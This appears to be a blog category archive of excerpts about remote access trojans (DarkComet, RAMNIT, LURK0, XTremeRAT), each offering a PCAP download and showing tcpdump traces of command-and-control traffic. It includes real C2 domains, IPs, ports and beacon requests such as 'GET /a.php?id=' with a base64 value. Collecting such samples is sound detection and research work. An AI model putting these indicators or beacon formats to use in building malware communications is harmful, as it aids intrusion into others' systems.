Category Archives: RAT – Remote Access Trojan

Infamous DarkComet RAT Remote Access Trojan or Remote Administration Tool PCAP Traffic Sample

Download DarkComet PCAP sample: darkcomet.pcap

DarkComet is a remote access Trojan (RAT) which was developed by Jean-Pierre Lesueur (known as DarkCoderSc), an independent programmer and computer security coder from France.[1] The developer does not call it a “remote administration Trojan,” but rather a “remote administration tool”. Although the RAT was developed back in…


RAMNIT Malware RAT Remote Access Trojan Backdoor Traffic Sample Download PCAP

Download RAMNIT PCAP here: ramnit2

2011-07-29 23:09:45.901035 IP 172.29.0.116.1026 > 68.87.73.246.53: 10515+ A? star-trakers.com. (34)
E..>*……….tDWI….5.*$.)…………star-trakers.com…..
2011-07-29 23:09:45.934019 IP 68.87.73.246.53 > 172.29.0.116.1026: 10515 1/0/0 A 207.223.0.140 (50)
E@.N..@.9…DWI….t.5…:..)…………star-trakers.com…………………
2011-07-29 23:09:45.934377 IP 172.29.0.116.1489 > 207.223.0.140.443: Flags [S], seq 1010670280, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0*.@…S(…t……..<=……p…,………..
2011-07-29 23:09:48.934987 IP 172.29.0.116.1489 > 207.223.0.140.443: Flags [S], seq…


LURK0 Remote Access Trojan Malware Traffic Sample Hard to Detect – port 9494

2012-10-07 02:59:50.712242 IP 172.16.253.132.1083 > 216.176.190.44.9494: Flags [P.], seq 1:152, ack 1, win 64240, length 151
E….|@….J…….,.;%…..Z…P…q…LURK0……..x.kf.e.apgpbpa0c..#…….. L.>…!`1..f.rF…….$..#…. ………..fHe(b(c.dH………l ..:..r..”…!..P ….v…V`z0d0`0…/.T…..g.)
2012-10-07 02:59:50.712552 IP 216.176.190.44.9494 > 172.16.253.132.1083: Flags [.], ack 152, win 64240, length 0
E..(0y………,….%..;Z…….P………….
2012-10-07 02:59:51.262392 IP 216.176.190.44.9494 > 172.16.253.132.1083: Flags [P.], seq 1:23, ack 152, win 64240, length 22
E..>0z………,….%..;Z…….P…….LURK0……..x.c……
2012-10-07 02:59:51.363241…


Darkcomet RAT – Remote Access Trojan Variant GET /a.php?id=

E..0.;@………@.+..*.P..`$….p……………
2013-02-03 22:49:45.139070 IP 64.235.43.131.80 > 172.16.253.130.1066: Flags [S.], seq 1557609149, ack 2358992933, win 64240, options [mss 1460], length 0
E..,[J……@.+……P.*\.:…`%`….T……..
2013-02-03 22:49:45.139138 IP 172.16.253.130.1066 > 64.235.43.131.80: Flags [.], ack 1, win 64240, length 0
E..(. 64.235.43.131.80: Flags [P.], seq 1:73, ack 1, win 64240, length 72
E..p.=@….I….@.+..*.P..`%\.:.P…Q…GET /a.php?id=c2ViYWxpQGxpYmVyby5pdA== HTTP/1.1
Host: 64.235.43.131
2013-02-03 22:49:45.139579 IP…


APT Like – XTremeRAT – Remote Access Trojan – Port 336 Traffic GET /1234567890.functions

………PV.z ……)..1………………….
2013-02-03 19:10:21.612693 IP 172.16.253.131.53 > 8.8.8.8.53: 47611+ A? shittway.zapto.org. (36)
E..@……………..5.5.,……………shittway.zapto.org…..
2013-02-03 19:10:21.612755 IP 172.16.253.131.53 > 4.2.2.2.53: 47611+ A? shittway.zapto.org. (36)
E..@……………..5.5.,……………shittway.zapto.org…..
2013-02-03 19:10:21.708585 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [S], seq 2370154844, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…S,……8F…P.E.\….p……………
2013-02-03 19:10:22.114884 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 1045510444, win 64240, length…
